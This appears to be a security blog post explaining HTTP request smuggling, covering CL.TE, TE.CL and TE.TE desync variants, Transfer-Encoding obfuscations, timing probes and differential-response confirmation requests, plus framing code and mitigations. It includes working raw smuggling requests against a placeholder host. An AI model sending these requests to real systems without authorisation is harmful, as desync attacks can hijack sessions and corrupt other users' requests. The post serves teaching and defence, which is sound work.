
HTTP Request Smuggling Vulnerability

Kortsec1 2024. 12. 8. 20:36

01. What is the HTTP Request Smuggling vulnerability?

The HTTP Request Smuggling (HRS) vulnerability was discovered in 2005. It exploits disagreement between a front-end server and a back-end server to insert an additional request.

[IMG1] HTTP Request Smuggling

  • Front-end : gives priority to the Content-Length header
  • Back-end : gives priority to the Transfer-Encoding header

Security problems that can arise in an example environment like the one above include privilege escalation, session hijacking, and exposure of sensitive information (critical info leak).

02. Background of HRS: the HTTP request headers

There are two ways to determine where an HTTP/1 request ends: the Content-Length header and the Transfer-Encoding header. Most HRS vulnerabilities originate here.

1) Content-Length

The Content-Length header specifies the length of the HTTP request body in bytes, which defines the end of the request unambiguously.

POST /search HTTP/1.1
HOST: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

x=smuggling

2) Transfer-Encoding

The Transfer-Encoding header is used when the request body consists of one or more chunk-encoded messages. Each chunk carries its length (in hexadecimal) followed by the chunk data, and a chunk of length 0 signals the end of the body.

POST /search HTTP/1.1
HOST: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b
x=smuggling
0

Problems can arise when both headers are used at the same time. With a single server there is of course a safeguard: in that case the Content-Length header is ignored. But when two or more chained servers are in use, and in particular when a server that supports the Transfer-Encoding header is chained with one that does not, problems occur.

Websites that use HTTP/2 end-to-end are immune to HRS attacks: even if an attacker sends ambiguous length information, HTTP/2's robust single length mechanism handles it exactly. Many websites, however, place an HTTP/2 front-end server in front of back-end servers that support only HTTP/1. This is resolved by means of HTTP downgrading.

03. Types of HRS vulnerability

A basic HRS attack includes both the Content-Length header and the Transfer-Encoding header. For ease of explanation, Content-Length and Transfer-Encoding are referred to as CL and TE from here on. Several vulnerability types exist, depending on the behaviour of the front-end and back-end servers.

  • CL.TE : the front-end server uses the CL header and the back-end server uses the TE header
  • TE.CL : the front-end server uses the TE header and the back-end server uses the CL header
  • TE.TE : both servers support the TE header, but the header can be obfuscated in a particular way so that one of the servers fails to process it normally

CL.TE

POST / HTTP/1.1
Host: kortsec1.com
Content-Length: 10
Transfer-Encoding: chunked

0

KANYE

This is the attack in an environment where the front-end server uses CL and the back-end server uses TE. The front-end, going by CL, reads the data up to and including "KANYE". The back-end, however, going by the TE header, meets the 0 and treats it as the end of the request, so "KANYE" is left behind. This leftover data is read the moment the next request arrives.

TE.CL

POST / HTTP/1.1
Host: kortsec1.com
Content-Length: 3
Transfer-Encoding: chunked

5
KANYE
0

This is the attack in an environment where the front-end server uses TE and the back-end server uses CL. The front-end, going by TE, accepts all of the request's data: 5 is the length of the body "KANYE", and the final 0 marks the end of the request. The final 0 must be followed by "\r\n\r\n". The forwarded request is treated differently by the back-end: a back-end that uses CL accepts only "5\r\n", based on the value 3. The remaining data, "KANYE" and what follows, is left behind on the back-end server and is taken as the start of the next request.
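As an added illustration (example code, not from the original post), the CL.TE and TE.CL requests above are run through a CL-only framer and a TE-only framer; the bytes the second parser does not consume are exactly what gets prepended to the next request. The ValueError branches model a parser that keeps waiting for more bytes, which is what the timing probes in section 04 rely on.

```python
# Added example, not from the original post: frame the same raw request with a
# CL-only parser and a TE-only parser and show the leftover that desyncs the connection.
CRLF = b"\r\n"

def split_head(raw: bytes):
    """Return (lower-cased header dict, offset at which the body starts)."""
    head, sep, _ = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:                 # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, len(head) + len(sep)

def frame_by_content_length(raw: bytes):
    """CL rule: the body is exactly Content-Length bytes. Returns (request, leftover)."""
    headers, body_at = split_head(raw)
    end = body_at + int(headers[b"content-length"])
    if end > len(raw):                                # the TE.CL timing probe ends up here
        raise ValueError("CL parser still waits for %d byte(s)" % (end - len(raw)))
    return raw[:end], raw[end:]

def frame_by_chunked(raw: bytes):
    """TE rule: hex-sized chunks until the 0 chunk. Returns (request, leftover)."""
    headers, pos = split_head(raw)
    while True:
        size_line, sep, _ = raw[pos:].partition(CRLF)
        if not sep:                                   # the CL.TE timing probe ends up here
            raise ValueError("TE parser still waits for the next chunk")
        size = int(size_line.split(b";")[0], 16)      # chunk-size[;extension]
        pos += len(size_line) + 2
        if size == 0:
            return raw[:pos + 2], raw[pos + 2:]       # skip the terminating CRLF
        pos += size + 2                               # chunk data + CRLF

def backend_leftover(raw: bytes, frontend_uses: str) -> bytes:
    """The front-end frames one request by its rule and forwards exactly those bytes;
    the back-end re-frames them by the other rule. Bytes it does not consume stay
    buffered and are prepended to the next request on the connection."""
    front, back = ((frame_by_content_length, frame_by_chunked) if frontend_uses == "CL"
                   else (frame_by_chunked, frame_by_content_length))
    forwarded, _ = front(raw)
    return back(forwarded)[1]

# Constructed from the post's examples (kortsec1.com is the post's placeholder host).
CL_TE = (b"POST / HTTP/1.1\r\nHost: kortsec1.com\r\nContent-Length: 10\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nKANYE")
TE_CL = (b"POST / HTTP/1.1\r\nHost: kortsec1.com\r\nContent-Length: 3\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n5\r\nKANYE\r\n0\r\n\r\n")
```

`backend_leftover(CL_TE, "CL")` yields the stranded `b"KANYE"`, and `backend_leftover(TE_CL, "TE")` yields everything after `5\r\n`, matching the two walkthroughs above.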

TE.TE

Both the front-end server and the back-end server support the TE header, but the header is obfuscated so that one of the two servers fails to process it normally. Because the attack relies on knowing and distinguishing how the various environments behave, an understanding of the environment is essential.

Transfer-Encoding: xchunked
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
A: A[\n]Transfer-Encoding: chunked
Transfer-Encoding : chunked

04. Detecting HRS vulnerabilities

Timing techniques

The most effective way to detect HRS vulnerabilities is the timing technique: a specific request is sent to the vulnerable application so as to cause a time delay.

  • Detecting CL.TE
POST / HTTP/1.1
Host: kortsec1.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X

This is detection in an environment with a CL.TE vulnerability. The front-end server, going by the CL header, forwards only the data excluding "X", and the back-end server, going by the TE header, waits for the next chunk. That is when the delay occurs.

  • Detecting TE.CL
POST / HTTP/1.1
Host: kortsec1.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

This is detection in an environment with a TE.CL vulnerability. The front-end, going by the TE header, forwards only the data up to the 0. The back-end, meanwhile, follows the CL header value and waits for 6 bytes of data, which is how the delay occurs. This probe can affect other users. To minimise the impact, or to detect covertly, it is better to run the CL.TE probe first and only then this test.

05. Confirming HRS vulnerabilities

Differential responses

Once the presence of a vulnerability has been identified, this method sends two requests to confirm it and to gather additional information. First, an attack request crafted to affect the next request is sent. Then a normal request is sent, and one checks whether it receives the expected response.

POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest

The request above is the normal request that is sent second. Sent on its own it would receive a normal response, but sent after the attack request it will receive a different one. Depending on that, CL.TE or TE.CL is determined.

  • CL.TE
POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=kanyewest&x=
0

GET /404 HTTP/1.1
Foo: x

This is the detection method for the case where a CL.TE vulnerability exists. If the attack request above succeeds, the last two lines are treated by the back-end server as part of the next request. So when the next normal request is sent, the result is as follows.

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest

  • TE.CL
POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

71
GET /404 HTTP/1.1
Host: kortsec1.com
Content-type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

This is the case where a TE.CL vulnerability exists. Once the attack request above is sent, the front-end server forwards all of it, and the back-end server, following the CL header, receives everything from "GET" onwards as the next request. So when the normal request is sent, it ends up being sent as shown below.

GET /404 HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

x=
0

POST /search HTTP/1.1
Host: kortsec1.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=kanyewest

06. Security

There are several ways to prevent HRS vulnerabilities.

  • Use HTTP/2 end to end and disable HTTP downgrading

Because HTTP/2 uses a robust mechanism for determining request length, using it end to end inherently prevents HRS. But if HTTP downgrading cannot be avoided, the rewritten request must be validated strictly against HTTP/1.1.

  • Handling of ambiguous requests

The front-end server should normalise ambiguous requests before forwarding them. The back-end server should still reject any request that remains ambiguous and close the TCP connection.

  • Reliable error handling

If a server-side exception occurs, the connection must be closed. This is basic, but it is an important point that is easy to neglect.
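One way to implement the front-end normalisation described above, as an added example (not code from the original post): the check rejects every ambiguous framing this post lists (CL together with TE, the TE.TE obfuscations, bare LF and whitespace-before-colon header lines) and otherwise re-serialises the header block in canonical form. The function name and the reason strings are assumptions of this example.

```python
# Added example, not from the original post: a front-end admission check that
# rejects ambiguous framing instead of forwarding it, and otherwise re-serialises
# the header block canonically. Function name and reason strings are assumed here.
import re
from typing import Optional, Tuple

TOKEN = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")   # RFC 9110 header-name token

def normalize_framing(raw: bytes) -> Tuple[Optional[str], Optional[bytes]]:
    """Return (None, canonical_request) when framing is unambiguous, else (reason, None);
    on a reason the front-end should reject the request and close the TCP connection."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return "incomplete header block", None
    request_line, *lines = head.split(b"\r\n")
    out, cl, te = [request_line], [], []
    for line in lines:
        if line[:1] in (b" ", b"\t"):                    # '[space]Transfer-Encoding: chunked'
            return "obs-fold / leading whitespace in header line", None
        if b"\n" in line or b"\r" in line:               # 'A: A[\n]Transfer-Encoding: chunked'
            return "bare CR or LF inside header line", None
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN.match(name):           # 'Transfer-Encoding : chunked'
            return "malformed header name %r" % name, None
        value = value.strip(b" \t")                      # OWS such as '[tab]chunked' is dropped
        if name.lower() == b"content-length":
            if not value.isdigit():
                return "non-numeric Content-Length", None
            cl.append(value)
        elif name.lower() == b"transfer-encoding":
            codings = [c.strip(b" \t").lower() for c in value.split(b",")]
            if codings != [b"chunked"]:                  # 'xchunked', 'chunked, identity', ...
                return "unsupported Transfer-Encoding %r" % value, None
            value = b"chunked"
            te.append(value)
        out.append(name + b": " + value)
    if cl and te:                                        # the CL.TE / TE.CL precondition
        return "both Content-Length and Transfer-Encoding present", None
    if len(set(cl)) > 1:
        return "conflicting Content-Length values", None
    return None, b"\r\n".join(out) + b"\r\n\r\n" + body
```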